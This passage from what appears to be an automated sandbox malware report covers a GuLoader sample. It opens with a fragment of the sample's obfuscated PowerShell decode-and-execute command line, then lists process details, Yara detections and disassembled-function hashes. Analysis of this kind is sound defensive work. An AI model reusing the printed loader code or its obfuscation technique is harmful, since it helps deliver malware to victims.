';$Coarrangement=$Selverkendelsers[0];Isoleringsmateriale (Isoelectric 'In$U gK lmao HbSnaSpl.r:T OAcp.ibL,rDruHugBieNet a= (BlT Ue isAltS -AgPSaaTat ChDi E $FaCKvoMea Nr r DaEknEtgBaeA mR,eLan.at S)Ne ');while (!$Opbruget) {Isoleringsmateriale (Isoelectric 'P.$Sig.ulEmo Bbe,aT l F:FoB recag ,iI,nNon,aeUdrNo= ,$A.tBlrKyuOpe a ') ;Isoleringsmateriale $Slutafregning;Isoleringsmateriale (Isoelectric 'seSpotDiaHer Nt ,-AsSU,lUde ,e lp n Ha4 H ');Isoleringsmateriale (Isoelectric ' B$Brg ClDoo,obSpaHel.n: cORep.ybS.rVauThgUneSntco= P(,nT,oeFosT,tRi-R.PAfaRetAph T Ge$SmC,po.uaafrDorUna.snOvgRee emU.eThnOmtKu)Sk ') ;Isoleringsmateriale (Isoelectric 'G,$ NgSvlBloPibDoaKal.i:,nHByeFrnPesDii.lgFlt as Pe ArInk BlK.rA iV.nS gSgeFln,ls .=Pl$P gUnl GoT.bMoaOplT,:NoSAvtNoyUdx.oiFeaFonf +.r+ Z%Ko$HyNDvaA,v,vl.iec r.y.VecDio.duFln Et n ') ;$Forsmtes=$Navler[$Hensigtserklringens];}$Tilvendelsens237=305549;$Urocentrummets=26395;Isoleringsmateriale (Isoelectric 'Po$.hgPrlReo ,bEmaUpl.a:ArS k FiasdJooK.oHe Op=Bi TyGChe t V- CCFro.hnUnt.peCon TtKo T$PrC,joBeaFlr.orO aFen.rg SeCam DeFonD tsp ');Isoleringsmateriale (Isoelectric 'Kl$Ang TlS,oPobB.aValSm:UnIArnCrvTrofilLevSle r De ,dRee.i I=po A [,fS yBes rtMoeLomBe.I C RoB,nCov UeKor rtBa]Pi:c.: bFDarsto UmT.BB.abusG.eFi6Er4,aS .tEnr Bi nthg .(,e$AmSRekKhi dJaoFio ,),u ');Isoleringsmateriale (Isoelectric 'Ud$IlgmelCooUnb TaRelVi:K.IdynUndJusMakMou idVesFos.rtM.nHai NnLag SeDir.ssFe Pe=.o Su[ BSZoyBas .tNyePrmAc.StTSieUdxVetOr..oEIsn.icMaoGedUniinnUdg .]Co:Ar:AnAMaSS,C ,I,mI S.A GDae.atDiSUntRerUni En WgSp(Fe$ iIHyn ,v,uo.tl uvSae ,rDieS dCoeK.) P ');Isoleringsmateriale (Isoelectric 'La$T,gDilHao MbG aPsl,i: GNdeeSumGuaRyt koafcMey GsCet L= o$,eIScnPed FsHykdeu odAfs VsTet Kn IiSanOdgK e ,r asTa.O sseuRibKls ctSerPriDonKlgFl(Fu$CaT Li,alfrvRae InindCieSilFos deLin .sBl2be3 M7C,,Sn$ayU FrM,oAacDue Sn Kt.ar muV m fm UeH tP,sYv) , ');Isoleringsmateriale $Nematocyst;"
              Imagebase:0x850000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000013.00000002.2567559021.0000000008B10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000013.00000002.2550702407.0000000005ECB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000013.00000002.2567702655.0000000009DB3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high
              Has exited:false

              General

              Target ID:20
              Start time:04:18:03
              Start date:03/07/2024
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
              Imagebase:0x410000
              File size:236'544 bytes
              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Disassembly

              Reset < >

                Executed Functions

                Function 00007FFAAC06B4F6 Relevance: .5, Instructions: 475COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000F.00000002.2647360300.00007FFAAC060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC060000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_15_2_7ffaac060000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b5d72823f90de49aa9922a99a82471540b6ea13abb7aa1a19974396668f378c8
                • Instruction ID: 19c08dd04f5114aa3fd8b4ec06b49dd8e8c46efbf877358b7c6c0eff5b10ffd5
                • Opcode Fuzzy Hash: b5d72823f90de49aa9922a99a82471540b6ea13abb7aa1a19974396668f378c8
                • Instruction Fuzzy Hash: E2F1A270908A4E8FEBA8DF28C8557E977E1FF55310F04827AE84EC7291CB78D9558B81
                Function 00007FFAAC06C2A2 Relevance: .5, Instructions: 460COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000F.00000002.2647360300.00007FFAAC060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC060000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_15_2_7ffaac060000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 772e20627312fae11ea93bd885ccd9a5c15eb31e377d68d93df5ac07bc2bab59
                • Instruction ID: e169226877b49779b03bca5a66afdac88c4c64c9b25a2a05f6c44782d9e37389
                • Opcode Fuzzy Hash: 772e20627312fae11ea93bd885ccd9a5c15eb31e377d68d93df5ac07bc2bab59
                • Instruction Fuzzy Hash: 78E1C230909A8E8FEBA8DF28C8557E97BD1FB55310F04827AD84DC7291CB74E9958B81
                Function 00007FFAAC136609 Relevance: .5, Instructions: 483COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000F.00000002.2648715990.00007FFAAC130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC130000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_15_2_7ffaac130000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0386281af82b758cb1d04b3f09e34183747a1ee85c06fafce6e5774f508e9af1
                • Instruction ID: e07cd570687228ba16e40fc76e72dbfc6b08421ae9d6c47ea2976b7e3d3b6091
                • Opcode Fuzzy Hash: 0386281af82b758cb1d04b3f09e34183747a1ee85c06fafce6e5774f508e9af1
                • Instruction Fuzzy Hash: 92E15975A0EB8ACFF7D69B2888555B87BE0FF56214B9441BAD04DC32D3DA28DC0983C1
                Function 00007FFAAC137625 Relevance: .4, Instructions: 426COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000F.00000002.2648715990.00007FFAAC130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC130000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_15_2_7ffaac130000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dd91221fa356629cf372615343fe296ce2bea07fb8e2b6d8eeb1cfc1f1fcc5db
                • Instruction ID: c795a0484160c429f7eaffa003d96988ab84b3bc73c74609bcca7f03de63e577
                • Opcode Fuzzy Hash: dd91221fa356629cf372615343fe296ce2bea07fb8e2b6d8eeb1cfc1f1fcc5db
                • Instruction Fuzzy Hash: 74D1F662E0EB8ACFF7D69B6848595B47BE1EF56224B1841FAD04DC7293DD18DC0983C1
                Function 00007FFAAC1367A7 Relevance: .2, Instructions: 159COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000F.00000002.2648715990.00007FFAAC130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC130000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_15_2_7ffaac130000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 02fdcc6d7eee1bdc8bfd84d784cbfe552431c1912530e7fc34d6720b176d21b2
                • Instruction ID: be447afc7ae63f0fb879c680b0dbdf9dccdbfac8d070f586ee6209faed94bc35
                • Opcode Fuzzy Hash: 02fdcc6d7eee1bdc8bfd84d784cbfe552431c1912530e7fc34d6720b176d21b2
                • Instruction Fuzzy Hash: 3B5118A6E0FB868FF7D69B2848645B86AE1FF4A254B9840F9D44DC32D3DD18DC4883C1
                Function 00007FFAAC137822 Relevance: .1, Instructions: 114COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000F.00000002.2648715990.00007FFAAC130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC130000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_15_2_7ffaac130000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 27a698c2aa3bdccb72bd1dba963f72c69411460d9fc240edace242be4ead29d6
                • Instruction ID: 4366b8a9ef998af45374f2cf8ba8f9c6f79938ae3383cc1943e3181a155f3e26
                • Opcode Fuzzy Hash: 27a698c2aa3bdccb72bd1dba963f72c69411460d9fc240edace242be4ead29d6
                • Instruction Fuzzy Hash: 3731F892E1FBC6CBF3E797681915578AAD0AF02264B5841FAD44DD32D3ED089C1883C2
                Function 00007FFAAC133890 Relevance: .1, Instructions: 110COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000F.00000002.2648715990.00007FFAAC130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC130000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_15_2_7ffaac130000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2ec1d790779897fe77e8ae35262e697178c0348cad7eb310ec342f6584c26552
                • Instruction ID: 4f1598863876d8a9dfb2194ebd0f539974691da1a8f4dcdc49dc8640876687fd
                • Opcode Fuzzy Hash: 2ec1d790779897fe77e8ae35262e697178c0348cad7eb310ec342f6584c26552
                • Instruction Fuzzy Hash: 0D310762B0E646CBF2E6971C5861574AAD1DF86354B9892B9D44EC32D2CD18E80A43C5
                Function 00007FFAAC063535 Relevance: .0, Instructions: 49COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000F.00000002.2647360300.00007FFAAC060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC060000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_15_2_7ffaac060000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                • Instruction ID: 8422e8d789a471c48372a08d3f5926e10fec79a7ee603465218e1dfa53f913cb
                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                • Instruction Fuzzy Hash: B201447111CB088FDB48EF0CE451AB5B7E0FB95364F10056DE58AC3662DB26E891CB45

                Non-executed Functions

                Function 00007FFAAC13088D Relevance: 1.0, Instructions: 1008COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000F.00000002.2648715990.00007FFAAC130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC130000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_15_2_7ffaac130000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 30e6671a900edb0ae6daf63dd0da3f653acac5efca0e433613351f05eec4a46e
                • Instruction ID: d2a0489a1c5af27a443e528174dcaf78057d2913dd318e78684c566d93b45765
                • Opcode Fuzzy Hash: 30e6671a900edb0ae6daf63dd0da3f653acac5efca0e433613351f05eec4a46e
                • Instruction Fuzzy Hash: 7D621671A0EB898FE397972898555A57FE0EF87224B0941FBD08DC7293DA18DC4AC3D1

                Executed Functions

                Function 04A8F1F0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: \V0k
                • API String ID: 0-3448288039
                • Opcode ID: 4267c449dedb246ec195e0f7fe8823024a34e4a9086d6d13813e3b4dd7c37bd4
                • Instruction ID: 89db1a938547f086096cb178bfd196985ff7d43ddae809a628bc1ae123dec5f4
                • Opcode Fuzzy Hash: 4267c449dedb246ec195e0f7fe8823024a34e4a9086d6d13813e3b4dd7c37bd4
                • Instruction Fuzzy Hash: B0B12070E0020A9FDF14DFA9D8857DDBBF2EF88314F14852DE815AB254EB74A845CB45
                Function 04A8FAC0 Relevance: .3, Instructions: 266COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 243122cca2161048dfad8994f621be9243adbc2635819826453cc2a35dc16eb6
                • Instruction ID: 79415049819d633b3469c79dc393092869debe731f143230b0ad7496c29ab1fe
                • Opcode Fuzzy Hash: 243122cca2161048dfad8994f621be9243adbc2635819826453cc2a35dc16eb6
                • Instruction Fuzzy Hash: CAB14070E0020ADFDB24DFA9D89579DBBF2EF88314F14852DE815EB254EB74A845CB81
                Function 076C3D38 Relevance: 15.5, Strings: 12, Instructions: 508COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                • API String ID: 0-3953147099
                • Opcode ID: 64a5c3b71a50b57c950bcf85de29fa349e92f96e35b22d45b90cba92ba958ca2
                • Instruction ID: 6e3f7108e5b5121b30301259999f628866f5ca3e516e5121f1242ee7bcb8f7c8
                • Opcode Fuzzy Hash: 64a5c3b71a50b57c950bcf85de29fa349e92f96e35b22d45b90cba92ba958ca2
                • Instruction Fuzzy Hash: 55F125B17043469FDB25CA76D81167ABFB1EF86210F18C0AED856CB351DB35D842C7A2
                Function 076C9230 Relevance: 13.0, Strings: 10, Instructions: 505COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                • API String ID: 0-4104424984
                • Opcode ID: a165d74577a3d398099ed278bd01dc863d5cc9152fc5c0058e136cac39b906e1
                • Instruction ID: ebe5d71c9e39cdcb7e9aaf3fb73c58d7295cff18cf8463fb5553c9e8b4199150
                • Opcode Fuzzy Hash: a165d74577a3d398099ed278bd01dc863d5cc9152fc5c0058e136cac39b906e1
                • Instruction Fuzzy Hash: BCF11AB1B003068FDB25DA79D41567ABBA2EFC5311B18847ED907CB391DB31E906CBA1
                Function 04A8BB00 Relevance: 10.5, Strings: 8, Instructions: 517COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 8N0k$Hq$h]0k$h]0k$h]0k$$q$$q$I0k
                • API String ID: 0-304494732
                • Opcode ID: 9120c966a78c9440ad66695ff1db54d592cf15c041fb89e5e0fdb910e9ce985d
                • Instruction ID: 98e1c5543845dea67d7fa011897a6bdaa737f38671cefa807c496eac8e9b5099
                • Opcode Fuzzy Hash: 9120c966a78c9440ad66695ff1db54d592cf15c041fb89e5e0fdb910e9ce985d
                • Instruction Fuzzy Hash: E4224F34B002148FDB29EB74D8547AEB7B2EF89315F1440A9D40AAB351DF35AE85CF91
                Function 076C60C0 Relevance: 8.6, Strings: 6, Instructions: 1116COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$4'q$4'q$tPq$tPq
                • API String ID: 0-3271992745
                • Opcode ID: 04ff727f9aa2cc165bcab5b6a856bfde5021735bb7f2f21f34c0cbf0b4797551
                • Instruction ID: 8914d28df6af049212e94c61e39dd4aee609cd377cb9581e9c57f65ee57b2c17
                • Opcode Fuzzy Hash: 04ff727f9aa2cc165bcab5b6a856bfde5021735bb7f2f21f34c0cbf0b4797551
                • Instruction Fuzzy Hash: 80927FB0B00305DFDB14CBA8C554B6ABBA2EF89314F14C469D90A9F795CB32EC46CB95
                Function 076C7508 Relevance: 8.3, Strings: 6, Instructions: 763COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                • API String ID: 0-1794337482
                • Opcode ID: 62d7f60de116657d2ea42389fb811c71e80e4f7caf1823194158b37d7ae7d05f
                • Instruction ID: 213cbbecedf8509738d4113f6fccd2e858ccffab37a46fe6f1aa72bb036bc42f
                • Opcode Fuzzy Hash: 62d7f60de116657d2ea42389fb811c71e80e4f7caf1823194158b37d7ae7d05f
                • Instruction Fuzzy Hash: 726271B0E00215DFDB24DB65C950BAABBB2FB85301F1485ADD90AAB745CB31EC46CF91
                Function 076C8990 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                • API String ID: 0-1794337482
                • Opcode ID: 0e994968e2724e3ca3121f6b63b85ca6686d1b3e90a9abb98f41e13e811f9306
                • Instruction ID: 30e52782d1ba704297243b58d7ca1804b3e5d6800ff9b4b27df716a4c907f23b
                • Opcode Fuzzy Hash: 0e994968e2724e3ca3121f6b63b85ca6686d1b3e90a9abb98f41e13e811f9306
                • Instruction Fuzzy Hash: 00D191B4A102099FDB24DBA4C450BAEBBB2EFC8315F14C459D9026F395CB72EC46CB91
                Function 076C98B0 Relevance: 4.0, Strings: 3, Instructions: 294COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$$q
                • API String ID: 0-3927140803
                • Opcode ID: 24227df7782b5831326a94a18c28985871c2c374671b7424e0331017826616e2
                • Instruction ID: 70a59980efa4be74cdeb766d8e70c0393b405b61707118d2c556c8328852a562
                • Opcode Fuzzy Hash: 24227df7782b5831326a94a18c28985871c2c374671b7424e0331017826616e2
                • Instruction Fuzzy Hash: CCA149B17043069FDB25CA75881077A7BA2DF86314F1C84AED547CB795CA35EC06CBA1
                Function 076C8970 Relevance: 4.0, Strings: 3, Instructions: 271COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$4'q
                • API String ID: 0-3126650252
                • Opcode ID: bb6342a610854bc0b335fbb4e28df1fdf641ca11350e0b0f56c3091242ead01c
                • Instruction ID: 9c9f744123b1e56a2fa9b1208c98237ae83dd1c114eb020c7f9a66bf04d89084
                • Opcode Fuzzy Hash: bb6342a610854bc0b335fbb4e28df1fdf641ca11350e0b0f56c3091242ead01c
                • Instruction Fuzzy Hash: 23B1A0B4A102069FDB24DFA4C540BAEBBB2EF88315F14C459D9026F395CB32EC46CB91
                Function 076C7B83 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q
                • API String ID: 0-1467158625
                • Opcode ID: 216d311c685bc77e43b5b9214bb91d9223a8f88220c69b82eb9e1a50f8d7a4c9
                • Instruction ID: fb80ae88cb1e645aeaad2b3809ae519a7feeadd887edbecb2e244a758a51bcf3
                • Opcode Fuzzy Hash: 216d311c685bc77e43b5b9214bb91d9223a8f88220c69b82eb9e1a50f8d7a4c9
                • Instruction Fuzzy Hash: 9FF17370B002159FE724DB64C850BAEBBB2EB84301F54849DD90AAF795CB71ED86CF91
                Function 04A8C7B8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: h]0k$I0k
                • API String ID: 0-3049796192
                • Opcode ID: 7cb66997af0ff3b2c3ab41af27ed12dff38c029b1bf9f9386e841aa632cc1ba9
                • Instruction ID: ceca96a2d1685a36cc9df7f15097ea271a5de9f6d046339b80e525b23f873a65
                • Opcode Fuzzy Hash: 7cb66997af0ff3b2c3ab41af27ed12dff38c029b1bf9f9386e841aa632cc1ba9
                • Instruction Fuzzy Hash: 1A311A34B011188FCB25EB74D895AEEB7B2EF89304F1044E9D50AAB351DB35AE85CF91
                Function 076C6458 Relevance: 1.9, Strings: 1, Instructions: 635COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q
                • API String ID: 0-1807707664
                • Opcode ID: 34683291bbaaf3572697b8efbe331ada3248c2e5b78965d8a384c977bb9f9d6e
                • Instruction ID: 71b3e8adabf790b5b43b9f1b2ea4f947822379ea3bf52f02a40e4a7977fad48b
                • Opcode Fuzzy Hash: 34683291bbaaf3572697b8efbe331ada3248c2e5b78965d8a384c977bb9f9d6e
                • Instruction Fuzzy Hash: C6425AB4A00205DFDB14CF98C554B69B7B2FB88314F54C499EA0A9F796CB32EC46CB45
                Function 04A8F1E4 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: \V0k
                • API String ID: 0-3448288039
                • Opcode ID: b129930eccd88666a0ce3c45827a8d9d94f3e62fd11272e444e2c3ba791b56e0
                • Instruction ID: 8a7b50566ff7a19f387adfcf3c2bd5c5b06540d80f88f3907b9df8e9b99317b2
                • Opcode Fuzzy Hash: b129930eccd88666a0ce3c45827a8d9d94f3e62fd11272e444e2c3ba791b56e0
                • Instruction Fuzzy Hash: 5FB15E70E0020ADFDB24DFA9D8857DEBBF1EF88314F24852DE815AB254EB74A845CB45
                Function 076C9895 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q
                • API String ID: 0-1807707664
                • Opcode ID: 0160ec545bde1e410c2250c31865530800ba80e0b0da0a4b23dc774d60ead3c1
                • Instruction ID: b7260157aee33e11471f231b6f74098e10cf014691e831cdda1c0f44bf205643
                • Opcode Fuzzy Hash: 0160ec545bde1e410c2250c31865530800ba80e0b0da0a4b23dc774d60ead3c1
                • Instruction Fuzzy Hash: 3F41D1F0B003028FCB25CA748550B7977A6EB86344F1C84ADD9068B795DB31ED45CBA2
                Function 076C6D41 Relevance: .5, Instructions: 459COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 909d4bc1770a0c788aa00fe0c88401451fc8d7f8c36ebd2f55aebb245a358951
                • Instruction ID: 6a0133e071e0aa1601012e6a0781e419d75534ba6a2111d38c91201352883cdf
                • Opcode Fuzzy Hash: 909d4bc1770a0c788aa00fe0c88401451fc8d7f8c36ebd2f55aebb245a358951
                • Instruction Fuzzy Hash: DD124AB4A00205DFD714CF98C594B69BBB2FB89314F54C099EA0A9F796CB32EC46CB45
                Function 04A84EA8 Relevance: .3, Instructions: 333COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ea52188528c27446829e612f84ad32d449ca1f2977af1ff1d633ff2d7447f998
                • Instruction ID: 1923a901d40e32f0a6751d07dbdc727961ee122e64f1561516cc433b3a36fc39
                • Opcode Fuzzy Hash: ea52188528c27446829e612f84ad32d449ca1f2977af1ff1d633ff2d7447f998
                • Instruction Fuzzy Hash: 57D11934E01219EFDB14DFA8D484A9DBBB2FF88314F248159E845AB365D735ED82CB90
                Function 04A845C0 Relevance: .3, Instructions: 317COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ed5ceae4d27624670d0493e651e59818460f918870544ef88281585ef7a2016c
                • Instruction ID: 4f9676666f2923dc386c59d44ade84d37dff94a6721ab190ab13326a0f220771
                • Opcode Fuzzy Hash: ed5ceae4d27624670d0493e651e59818460f918870544ef88281585ef7a2016c
                • Instruction Fuzzy Hash: F2D1F574A01219EFDB15DF98D484AADBBB2FF88314F248159E805AB355D731ED82CB90
                Function 076C70D9 Relevance: .3, Instructions: 294COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 18b74ab3ecabcf843c0217c8ea7222b316ce10d086be0f9bd938429566d0adad
                • Instruction ID: c16950c7704a6d28462322f6957ecfb191239021a978741db67db3941f384fa5
                • Opcode Fuzzy Hash: 18b74ab3ecabcf843c0217c8ea7222b316ce10d086be0f9bd938429566d0adad
                • Instruction Fuzzy Hash: C7B19FB0A10204DFDB15DB64C450BAABBB2EF89315F54C059EA0AAF791CB32EC45CF91
                Function 076C7100 Relevance: .3, Instructions: 275COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d1452ceb35f1ca178e43a06ea792581bd8ea53a80ba3dd9573d411d60650fe0
                • Instruction ID: b4802b750368e787e57f8de4851a1fc3e020fde4a1e0c086ba23f4982b28b04e
                • Opcode Fuzzy Hash: 8d1452ceb35f1ca178e43a06ea792581bd8ea53a80ba3dd9573d411d60650fe0
